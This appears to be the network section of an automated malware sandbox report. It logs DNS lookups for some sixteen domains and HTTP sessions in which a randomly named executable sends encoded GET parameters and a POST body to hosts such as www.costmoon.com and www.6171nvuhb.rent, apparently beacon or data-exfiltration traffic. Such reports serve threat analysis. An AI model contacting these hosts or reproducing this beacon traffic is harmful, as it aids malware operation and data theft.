                                                            Jul 3, 2024 17:41:49.156929970 CEST4983280192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:49.163105011 CEST4983280192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:41:49.294735909 CEST804983274.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:41:54.187926054 CEST4983380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:54.306802988 CEST8049833199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:54.306963921 CEST4983380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:54.322752953 CEST4983380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:54.441469908 CEST8049833199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:54.462959051 CEST8049833199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:54.462980032 CEST8049833199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:54.462997913 CEST8049833199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:54.463125944 CEST4983380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:54.468404055 CEST8049833199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:54.468528986 CEST4983380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:55.826141119 CEST4983380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:56.855627060 CEST4983480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:56.974123955 CEST8049834199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:56.974271059 CEST4983480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:56.990092993 CEST4983480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:57.108665943 CEST8049834199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:57.130173922 CEST8049834199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:57.130189896 CEST8049834199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:57.130202055 CEST8049834199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:57.130381107 CEST4983480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:57.137589931 CEST8049834199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:57.137881994 CEST4983480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:58.497473955 CEST4983480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.526906967 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.645411015 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.645611048 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.662462950 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.662508965 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.662580967 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.781053066 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781064987 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781138897 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781229019 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.781235933 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781244993 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781253099 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781297922 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781312943 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781327009 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781335115 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.781378031 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.781572104 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.781743050 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.781915903 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.899893999 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.899986029 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.899997950 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900007010 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900074005 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.900105953 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900120974 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900137901 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900162935 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900204897 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900235891 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900250912 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.900357962 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900367022 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900374889 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900413990 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900413990 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.900422096 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900429010 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900443077 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900451899 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900465012 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900481939 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:41:59.900584936 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:41:59.900755882 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:00.018717051 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.018835068 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.018843889 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.018851995 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.018954992 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.018970966 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.019217968 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.019233942 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.019248009 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.019262075 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.019309044 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.019320965 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.039623022 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.039634943 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.039696932 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.039779902 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:00.039844036 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:00.045649052 CEST8049835199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:00.045778990 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:01.168770075 CEST4983580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:02.198642969 CEST4983680192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:02.317162991 CEST8049836199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:02.317353010 CEST4983680192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:02.330769062 CEST4983680192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:02.449234009 CEST8049836199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:02.473639965 CEST8049836199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:02.473654032 CEST8049836199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:02.473671913 CEST8049836199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:02.473956108 CEST4983680192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:02.477688074 CEST8049836199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:02.477899075 CEST4983680192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:02.481570005 CEST4983680192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:42:02.600119114 CEST8049836199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:42:07.512299061 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:08.525233984 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:10.540426970 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:14.555139065 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:22.569051981 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:29.613013029 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:30.614150047 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:32.629331112 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:36.644084930 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:44.657955885 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:51.701934099 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:52.703097105 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:42:54.718925953 CEST4978680192.168.11.20154.53.59.40

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 3, 2024 17:34:50.789199114 CEST5091353192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:34:50.918788910 CEST53509131.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:35:16.304828882 CEST5581953192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:35:16.901663065 CEST53558191.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:35:31.457973003 CEST5595753192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:35:31.627306938 CEST53559571.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:35:45.017513990 CEST5764653192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:35:45.230792046 CEST53576461.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:35:58.564575911 CEST5260953192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:35:58.693449020 CEST53526091.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:37:31.089766979 CEST5577053192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:37:31.234551907 CEST53557701.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:37:44.600956917 CEST5973353192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:37:44.842118025 CEST53597331.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:37:58.426227093 CEST5591953192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:37:58.592010975 CEST53559191.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:38:13.626250029 CEST5631153192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:38:13.826337099 CEST53563111.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:38:27.654037952 CEST6135953192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:38:27.794514894 CEST53613591.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:38:41.244800091 CEST5612853192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:38:41.387883902 CEST53561281.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:38:55.007463932 CEST6158153192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:38:55.179863930 CEST53615811.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:39:08.537116051 CEST6278253192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:39:08.660125017 CEST53627821.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:39:16.737005949 CEST6313153192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:39:16.932450056 CEST53631311.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:39:31.593187094 CEST5206053192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:39:31.774889946 CEST53520601.1.1.1192.168.11.20
                                                            Jul 3, 2024 17:41:04.166651964 CEST5429253192.168.11.201.1.1.1
                                                            Jul 3, 2024 17:41:04.461167097 CEST53542921.1.1.1192.168.11.20

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jul 3, 2024 17:34:50.789199114 CEST192.168.11.201.1.1.10x672aStandard query (0)www.costmoon.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:35:16.304828882 CEST192.168.11.201.1.1.10xd19aStandard query (0)www.6171nvuhb.rentA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:35:31.457973003 CEST192.168.11.201.1.1.10xe1aaStandard query (0)www.motorsportgives.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:35:45.017513990 CEST192.168.11.201.1.1.10x3b84Standard query (0)www.orthonow.liveA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:35:58.564575911 CEST192.168.11.201.1.1.10x7410Standard query (0)www.adamknoxexperience.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:37:31.089766979 CEST192.168.11.201.1.1.10x7ca1Standard query (0)www.musiccitysauce.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:37:44.600956917 CEST192.168.11.201.1.1.10x6abbStandard query (0)www.lakemontbellevue.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:37:58.426227093 CEST192.168.11.201.1.1.10x51e2Standard query (0)www.vintagewins.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:13.626250029 CEST192.168.11.201.1.1.10xd925Standard query (0)www.spotluv.xyzA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:27.654037952 CEST192.168.11.201.1.1.10xcd12Standard query (0)www.olhadeputat.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:41.244800091 CEST192.168.11.201.1.1.10x4e91Standard query (0)www.voupeclients.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:55.007463932 CEST192.168.11.201.1.1.10xa9d3Standard query (0)www.fundraiserstuffies.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:39:08.537116051 CEST192.168.11.201.1.1.10xcbe4Standard query (0)www.marktuana.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:39:16.737005949 CEST192.168.11.201.1.1.10x92Standard query (0)www.paliinfra.comA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:39:31.593187094 CEST192.168.11.201.1.1.10x2184Standard query (0)www.t8nia9vkpx.icuA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:41:04.166651964 CEST192.168.11.201.1.1.10x9653Standard query (0)www.selllaptop.orgA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jul 3, 2024 17:34:50.918788910 CEST1.1.1.1192.168.11.200x672aNo error (0)www.costmoon.com74.208.236.38A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:35:16.901663065 CEST1.1.1.1192.168.11.200xd19aNo error (0)www.6171nvuhb.rent142.202.6.230A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:35:31.627306938 CEST1.1.1.1192.168.11.200xe1aaNo error (0)www.motorsportgives.com74.208.236.230A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:35:45.230792046 CEST1.1.1.1192.168.11.200x3b84No error (0)www.orthonow.live199.59.243.226A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:35:58.693449020 CEST1.1.1.1192.168.11.200x7410No error (0)www.adamknoxexperience.comadamknoxexperience.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 3, 2024 17:35:58.693449020 CEST1.1.1.1192.168.11.200x7410No error (0)adamknoxexperience.com154.53.59.40A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:37:31.234551907 CEST1.1.1.1192.168.11.200x7ca1No error (0)www.musiccitysauce.commusiccitysauce.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 3, 2024 17:37:31.234551907 CEST1.1.1.1192.168.11.200x7ca1No error (0)musiccitysauce.com3.33.130.190A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:37:31.234551907 CEST1.1.1.1192.168.11.200x7ca1No error (0)musiccitysauce.com15.197.148.33A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:37:44.842118025 CEST1.1.1.1192.168.11.200x6abbNo error (0)www.lakemontbellevue.comlakemontbellevue.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 3, 2024 17:37:44.842118025 CEST1.1.1.1192.168.11.200x6abbNo error (0)lakemontbellevue.com66.235.200.145A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:37:58.592010975 CEST1.1.1.1192.168.11.200x51e2No error (0)www.vintagewins.comvintagewins.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 3, 2024 17:37:58.592010975 CEST1.1.1.1192.168.11.200x51e2No error (0)vintagewins.com103.120.176.124A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:13.826337099 CEST1.1.1.1192.168.11.200xd925No error (0)www.spotluv.xyz203.161.50.127A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:27.794514894 CEST1.1.1.1192.168.11.200xcd12No error (0)www.olhadeputat.com172.67.146.224A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:27.794514894 CEST1.1.1.1192.168.11.200xcd12No error (0)www.olhadeputat.com104.21.57.155A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:41.387883902 CEST1.1.1.1192.168.11.200x4e91No error (0)www.voupeclients.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 3, 2024 17:38:41.387883902 CEST1.1.1.1192.168.11.200x4e91No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:41.387883902 CEST1.1.1.1192.168.11.200x4e91No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:55.179863930 CEST1.1.1.1192.168.11.200xa9d3No error (0)www.fundraiserstuffies.comfundraiserstuffies.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 3, 2024 17:38:55.179863930 CEST1.1.1.1192.168.11.200xa9d3No error (0)fundraiserstuffies.com3.33.130.190A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:38:55.179863930 CEST1.1.1.1192.168.11.200xa9d3No error (0)fundraiserstuffies.com15.197.148.33A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:39:08.660125017 CEST1.1.1.1192.168.11.200xcbe4Name error (3)www.marktuana.comnonenoneA (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:39:16.932450056 CEST1.1.1.1192.168.11.200x92No error (0)www.paliinfra.comwww.paliinfra.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 3, 2024 17:39:16.932450056 CEST1.1.1.1192.168.11.200x92No error (0)www.paliinfra.com.cdn.hstgr.net84.32.84.192A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:39:31.774889946 CEST1.1.1.1192.168.11.200x2184No error (0)www.t8nia9vkpx.icu47.76.215.53A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:41:04.461167097 CEST1.1.1.1192.168.11.200x9653No error (0)www.selllaptop.orgselllaptop.orgCNAME (Canonical name)IN (0x0001)false
                                                            Jul 3, 2024 17:41:04.461167097 CEST1.1.1.1192.168.11.200x9653No error (0)selllaptop.org3.33.130.190A (IP address)IN (0x0001)false
                                                            Jul 3, 2024 17:41:04.461167097 CEST1.1.1.1192.168.11.200x9653No error (0)selllaptop.org15.197.148.33A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.costmoon.com
                                                            • www.6171nvuhb.rent
                                                            • www.motorsportgives.com
                                                            • www.orthonow.live
                                                            • www.musiccitysauce.com
                                                            • www.lakemontbellevue.com
                                                            • www.vintagewins.com
                                                            • www.spotluv.xyz
                                                            • www.olhadeputat.com
                                                            • www.voupeclients.com
                                                            • www.fundraiserstuffies.com
                                                            • www.paliinfra.com
                                                            • www.selllaptop.org

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.11.204977374.208.236.38807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:34:51.075294971 CEST520OUTGET /9m56/?_B7=LxyxWrj8kri0gh&vX=wSNNrhltoDErcnEzxm9/w28Dp1eoX3XTDY+0HSDY/xjQqFM+lgiwoO0LpiVzuA8Bz+prc1fM5Kq2+VzXMkRPAHQ+fn8FfBllirngXHZ4XxgzDhA7JZPwDGY= HTTP/1.1
                                                            Host: www.costmoon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:34:51.209486008 CEST770INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Content-Length: 626
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:34:51 GMT
                                                            Server: Apache
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.11.2049774142.202.6.230807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:35:17.093039036 CEST788OUTPOST /hqcp/ HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.6171nvuhb.rent
                                                            Referer: http://www.6171nvuhb.rent/hqcp/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 58 35 78 77 45 6f 74 53 56 2f 52 53 53 33 4c 58 75 4e 6a 30 32 38 72 30 69 38 76 63 2f 42 30 2f 79 43 66 34 47 66 46 73 45 4b 75 31 79 79 61 67 34 34 53 56 67 46 2b 62 32 41 2f 70 59 79 6b 4f 77 66 4c 77 61 70 4b 4c 36 37 76 6c 72 62 44 72 58 6b 62 6b 45 78 37 41 32 61 56 41 66 6d 4e 62 6d 45 6b 37 52 78 31 38 34 74 68 6e 2b 79 2b 5a 6b 42 50 6d 4d 6d 57 6b 4b 6f 72 6b 45 73 66 42 2b 49 76 74 51 6b 74 6c 79 50 4f 4c 32 7a 55 39 52 74 44 30 38 56 42 6f 68 5a 69 41 70 62 4c 76 46 54 49 4b 59 59 2b 67 4b 62 31 58 53 61 66 54 6b 32 65 6c 50 49 45 4c 67 45 4a 4b 46 76 2f 31 58 41 3d 3d
                                                            Data Ascii: vX=X5xwEotSV/RSS3LXuNj028r0i8vc/B0/yCf4GfFsEKu1yyag44SVgF+b2A/pYykOwfLwapKL67vlrbDrXkbkEx7A2aVAfmNbmEk7Rx184thn+y+ZkBPmMmWkKorkEsfB+IvtQktlyPOL2zU9RtD08VBohZiApbLvFTIKYY+gKb1XSafTk2elPIELgEJKFv/1XA==
                                                            Jul 3, 2024 17:35:18.260947943 CEST715INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:35:18 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 66 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 53 dd 6f da 30 10 7f e7 af f0 fc 14 24 e2 7c 92 84 02 9d 80 81 d4 0e 51 4d a5 7d a1 11 72 1c a7 09 25 09 b2 9d 35 5b cb ff be cb c2 36 b4 ee b9 5a a4 cb f9 ce 77 f7 3b df c7 48 32 91 1d 14 62 29 15 92 ab 31 be 5b 2f f4 00 a3 2c 1e e3 e5 64 3b bb 59 2e e7 b3 35 46 52 b0 31 36 0c 19 3f 91 be 45 f6 d4 d8 49 1d 04 fd 20 4a 92 67 05 d9 49 7c 39 32 da 60 97 9d d1 e9 b0 9c 90 ac c8 94 f6 92 c5 17 d8 b9 9a ca fb 5b 61 d7 37 93 d9 d5 fd f5 1d ee b1 a7 7f 68 8f dd b7 71 3a 5f a9 40 db 34 57 68 dc b2 d7 57 b4 09 87 1d 2d a9 0a a6 b2 b2 d0 ba e8 a5 83 50 63 96 e6 60 14 97 ac ca 79 a1 08 13 9c 2a 3e df f3 46 d2 70 9b 17 ee 0e c1 38 cd 09 bc 0a 8c 71 aa d4 41 5e 18 06 68 22 9a c5 15 61 65 de 08 3b f9 31 30 4d c6 12 db 77 99 43 fb 03 87 3a 5e df e1 1e 65 51 12 c1 8d cf 70 13 a9 81 95 e7 a8 8f 5c 9d 20 e5 f4 db 9a 3e ae 68 ce ff 80 6f cc 70 88 c0 4d 92 03 15 90 d6 aa 8c 39 d4 49 72 a1 a6 3c 29 05 d7 d2 bc 87 24 24 79 ec 6a f0 3f ab c7 07 5d b7 74 fd 77 81 df a3 6d 9f [TRUNCATED]
